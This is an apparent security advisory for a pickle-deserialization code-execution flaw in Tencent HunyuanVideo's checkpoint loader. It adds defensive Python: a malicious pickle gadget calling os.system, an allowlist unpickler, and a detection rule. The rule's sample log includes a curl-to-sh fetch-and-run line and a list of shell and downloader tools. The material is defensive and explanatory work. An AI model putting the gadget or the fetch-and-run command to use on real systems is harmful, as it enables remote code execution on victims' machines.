CVE-2025-13710
📋 TL;DR
This vulnerability allows remote attackers to execute arbitrary code on Tencent HunyuanVideo installations through deserialization of untrusted data in the load_vae function. The code runs with the privileges of the HunyuanVideo process, which is root in the reported configuration. Exploitation requires user interaction: a user must load an attacker-supplied file (for a loader such as load_vae, a crafted model checkpoint) or visit a page that delivers one. No authentication is required. Users of Tencent HunyuanVideo are affected.
💻 Affected Systems
- Tencent HunyuanVideo
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine whether your system is affected.
Why? The CVE database entry does not specify which versions are vulnerable (no version ranges were provided by the vendor or NVD). HunyuanVideo is distributed as a Git repository, so the fix is identified by a commit rather than by a release number.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise with root-level code execution, leading to data theft, ransomware deployment, or persistent backdoor installation.
Likely Case
Attacker gains root access to affected systems, potentially installing malware, exfiltrating sensitive data, or using the system as a pivot point.
If Mitigated
Limited impact if HunyuanVideo runs as an unprivileged user inside a sandbox or container on a segmented network: the attacker still gets code execution, but only inside that boundary rather than as root on the host.
🎯 Exploit Status
Exploitation requires user interaction (a user must load an attacker-supplied file) but no authentication. The issue was reported through ZDI; given the impact (code execution as root via a file format users routinely download), treat weaponization as plausible even though no public exploit is referenced here.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Commit b47e10b95483aa8458b64d23350844c29e91c408
Vendor Advisory: https://github.com/Tencent-Hunyuan/HunyuanVideo/commit/b47e10b95483aa8458b64d23350844c29e91c408
Restart Required: Yes
Instructions:
1. Update to a HunyuanVideo checkout that contains commit b47e10b95483aa8458b64d23350844c29e91c408, or cherry-pick that commit onto your deployed revision.
2. Restart the HunyuanVideo service and any long-running process that imported the old module, so the patched code is actually loaded.
3. Verify the fix by confirming that the commit is in the checked-out history (see How to Verify).
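What this class of flaw looks like in code, and how the two standard defenses behave, as an added example. This is not HunyuanVideo's code and not the content of the fix commit. It assumes the vulnerable path hands an attacker-supplied checkpoint to a full pickle deserializer, which is what torch.load does when weights_only is not set; plain pickle is used so it runs without torch, and the small allowlist is illustrative rather than torch's own.

```python
"""Added example (not HunyuanVideo project code and not the fix commit):
the deserialization pattern behind checkpoint-loading RCE, a static
pre-scan, and an allowlist loader in the spirit of torch.load(weights_only=True).

Assumption, labelled: the vulnerable path feeds an attacker-supplied
checkpoint to a full pickle deserializer.  PyTorch checkpoints are zip
archives wrapping a pickle, and torch.load without weights_only=True
reconstructs arbitrary globals exactly as pickle.load does; plain pickle
is used here so the example runs without torch installed.
"""
import io
import os
import pickle
import pickletools
from typing import Any, Dict, List, Tuple

# Globals a weights-only style loader may reconstruct.  torch's real
# allowlist is longer (tensor and storage types); this list is illustrative.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
    ("builtins", "dict"),
    ("builtins", "list"),
}


class _Payload:
    """Constructed malicious object.  Pickling it records a call to
    os.system("echo pwned"); the call runs only when the stream is
    deserialized by a loader that honours REDUCE, i.e. pickle.load."""
    def __reduce__(self):
        return (os.system, ("echo pwned",))


def benign_checkpoint() -> bytes:
    # Constructed sample: a minimal state_dict-like mapping of plain values.
    return pickle.dumps(
        {"vae.encoder.weight": [0.1, 0.2], "vae.decoder.bias": [0.0]}, protocol=4)


def malicious_checkpoint() -> bytes:
    # Constructed sample: same shape, plus one entry that is an RCE gadget.
    return pickle.dumps(
        {"vae.encoder.weight": [0.1, 0.2], "__hook__": _Payload()}, protocol=4)


def load_unsafe(blob: bytes) -> Any:
    """The vulnerable pattern: full pickle deserialization of untrusted bytes.
    Shown for contrast only; never call it on attacker-controlled input."""
    return pickle.loads(blob)


def scan_pickle(blob: bytes) -> Dict[str, Any]:
    """Static pre-check that executes nothing: walk the opcode stream, collect
    every module.name the pickle asks to import, and note whether any
    object-constructing opcode is present.  Safety is judged on the globals:
    a legitimate tensor checkpoint also uses REDUCE, but only on allowed names."""
    globals_seen: List[Tuple[str, str]] = []
    recent_strings: List[str] = []
    constructs = False
    for op, arg, _pos in pickletools.genops(blob):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            recent_strings.append(arg)
        elif op.name == "GLOBAL":            # protocol <= 3: arg is "module name"
            mod, name = arg.split(" ", 1)
            globals_seen.append((mod, name))
        elif op.name == "STACK_GLOBAL":      # protocol 4+: two strings precede it
            # Simplification: assumes module and name were pushed directly
            # before (true for pickle.dumps output; a memo hit via BINGET
            # would not be resolved here).
            globals_seen.append((recent_strings[-2], recent_strings[-1]))
        elif op.name in ("REDUCE", "BUILD", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"):
            constructs = True
    return {
        "globals": globals_seen,
        "constructs_objects": constructs,
        "unsafe": any(g not in SAFE_GLOBALS for g in globals_seen),
    }


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist loader: find_class is consulted before a global is resolved,
    so a blocked name aborts the load before REDUCE can invoke it."""
    def find_class(self, module: str, name: str) -> Any:
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def load_safe(blob: bytes) -> Any:
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def is_blocked(blob: bytes) -> bool:
    """True if the allowlist loader refuses the stream (nothing is executed)."""
    try:
        load_safe(blob)
    except pickle.UnpicklingError:
        return True
    return False
```

Run scan_pickle over a downloaded checkpoint before it ever reaches a loader; the malicious sample shows up as a global named system outside the allowlist, while the benign state_dict references no globals at all. The pre-scan is a triage aid, not the control: the control is refusing to deserialize with anything other than an allowlist loader (weights_only=True in torch, or safetensors, which has no code-execution path by design).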
🔧 Temporary Workarounds
Restrict file access
Limit users' ability to open untrusted files with HunyuanVideo, in particular model checkpoints obtained from untrusted sources
Network segmentation
Isolate HunyuanVideo systems from critical networks
🧯 If You Can't Patch
- Implement strict file access controls so that only trusted, integrity-checked model checkpoints can be loaded with HunyuanVideo, and only by users who need to
- Run HunyuanVideo as an unprivileged user inside a sandbox or container so that a successful exploit does not yield root on the host
🔍 How to Verify
Check if Vulnerable:
Check whether the deployed HunyuanVideo revision predates commit b47e10b95483aa8458b64d23350844c29e91c408; a checkout whose history does not contain that commit is vulnerable
Check Version:
HunyuanVideo is distributed as a Git repository, so identify the installed revision from the checkout (the HEAD commit) rather than from an application interface or configuration file
Verify Fix Applied:
Verify that commit b47e10b95483aa8458b64d23350844c29e91c408 is an ancestor of the checked-out HEAD (for example with git merge-base --is-ancestor, which exits 0 when the fix is present), and that the running service was restarted after the update
📡 Detection & Monitoring
Log Indicators:
- Unexpected child processes (shells, downloaders, network tools) spawned by the Python process that runs HunyuanVideo
- Deserialization (pickle/torch.load) errors or warnings in application logs, which can indicate a malformed or tampered checkpoint
- Checkpoint files written to the model directory from unexpected sources shortly before the process started
Network Indicators:
- Outbound connections from HunyuanVideo to suspicious IPs
- Unexpected network traffic patterns
SIEM Query:
parent_process_name:python* AND parent_process_command_line:*HunyuanVideo* AND process_name:(sh OR bash OR dash OR curl OR wget OR nc)
Field names are illustrative and must be mapped to your SIEM's process-creation schema. Note that the process name of a Python application is the interpreter, not "HunyuanVideo", and that Windows integrity levels do not apply to a Linux deployment, so match on the parent's command line instead.
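The detection logic run over sample telemetry, as an added example that is not part of the advisory or the HunyuanVideo project. The event schema, the log lines and the command-line markers (repository name, sample script and package directory) are constructed or assumed for this example; map the field names onto your EDR, auditd or eBPF source.

```python
"""Added example, not part of the advisory or the HunyuanVideo project:
a process-tree detection for what follows a successful malicious-checkpoint
load.  The telemetry schema and every log line are constructed for this
example; map the field names onto your EDR, auditd or eBPF source."""
import json
import os
from typing import Dict, Iterable, List

# Substrings that identify the HunyuanVideo Python process in a command line.
# Assumption: derived from the repository name and its sample script/package
# layout; adjust to how the service is launched in your environment.
HUNYUAN_MARKERS = ("HunyuanVideo", "sample_video.py", "hyvideo")

# Children a model-loading process has no business spawning.  The Python
# interpreter is deliberately NOT listed: torch DataLoader / multiprocessing
# workers legitimately re-exec python and would flood the rule with noise.
SHELL_OR_DOWNLOADER = {"sh", "bash", "dash", "zsh", "curl", "wget",
                       "nc", "ncat", "socat", "perl"}

# Constructed sample telemetry: one JSON object per process-creation event.
SAMPLE_EVENTS = [
    json.dumps({"ts": "2025-11-20T10:00:01Z", "pid": 4101, "ppid": 4000,
                "image": "/usr/bin/nvidia-smi", "cmdline": "nvidia-smi -L",
                "parent_image": "/usr/bin/python3",
                "parent_cmdline": "python3 /opt/HunyuanVideo/sample_video.py"}),
    json.dumps({"ts": "2025-11-20T10:00:07Z", "pid": 4102, "ppid": 4000,
                "image": "/bin/sh",
                "cmdline": "sh -c 'curl -s http://198.51.100.7/x | sh'",
                "parent_image": "/usr/bin/python3",
                "parent_cmdline": "python3 /opt/HunyuanVideo/sample_video.py"}),
    json.dumps({"ts": "2025-11-20T10:00:09Z", "pid": 4103, "ppid": 4000,
                "image": "/usr/bin/python3",
                "cmdline": "python3 -c 'from multiprocessing.spawn import spawn_main; spawn_main(tracker_fd=5, pipe_handle=7)'",
                "parent_image": "/usr/bin/python3",
                "parent_cmdline": "python3 /opt/HunyuanVideo/sample_video.py"}),
    json.dumps({"ts": "2025-11-20T10:01:00Z", "pid": 5201, "ppid": 5200,
                "image": "/usr/bin/curl", "cmdline": "curl -I https://example.com",
                "parent_image": "/bin/bash", "parent_cmdline": "bash"}),
    json.dumps({"ts": "2025-11-20T10:02:00Z", "pid": 6101, "ppid": 6100,
                "image": "/bin/sh", "cmdline": "sh -c 'ls'",
                "parent_image": "/usr/bin/python3",
                "parent_cmdline": "python3 /opt/other/train.py"}),
]


def _basename(path: str) -> str:
    return os.path.basename(path or "")


def is_hunyuan_parent(ev: Dict) -> bool:
    """Parent is a Python interpreter whose command line points at HunyuanVideo."""
    return (_basename(ev.get("parent_image", "")).startswith("python")
            and any(m in ev.get("parent_cmdline", "") for m in HUNYUAN_MARKERS))


def detect(lines: Iterable[str]) -> List[Dict]:
    """Flag shells and downloaders spawned by the HunyuanVideo process.
    Unrelated shells, and python workers of the same parent, are not flagged."""
    hits: List[Dict] = []
    for line in lines:
        ev = json.loads(line)
        if is_hunyuan_parent(ev) and _basename(ev.get("image", "")) in SHELL_OR_DOWNLOADER:
            hits.append({"rule": "hunyuan_spawned_shell_or_downloader",
                         "ts": ev["ts"], "pid": ev["pid"], "ppid": ev["ppid"],
                         "cmdline": ev["cmdline"]})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(json.dumps(hit))
```

Of the five constructed events only the shell piping curl output to sh is flagged: the GPU query and the multiprocessing worker are normal children of the same parent, and the two other shells belong to unrelated processes. This rule fires after exploitation has already succeeded, so pair it with the file-origin and deserialization-error indicators above and with the outbound-connection checks in the network indicators.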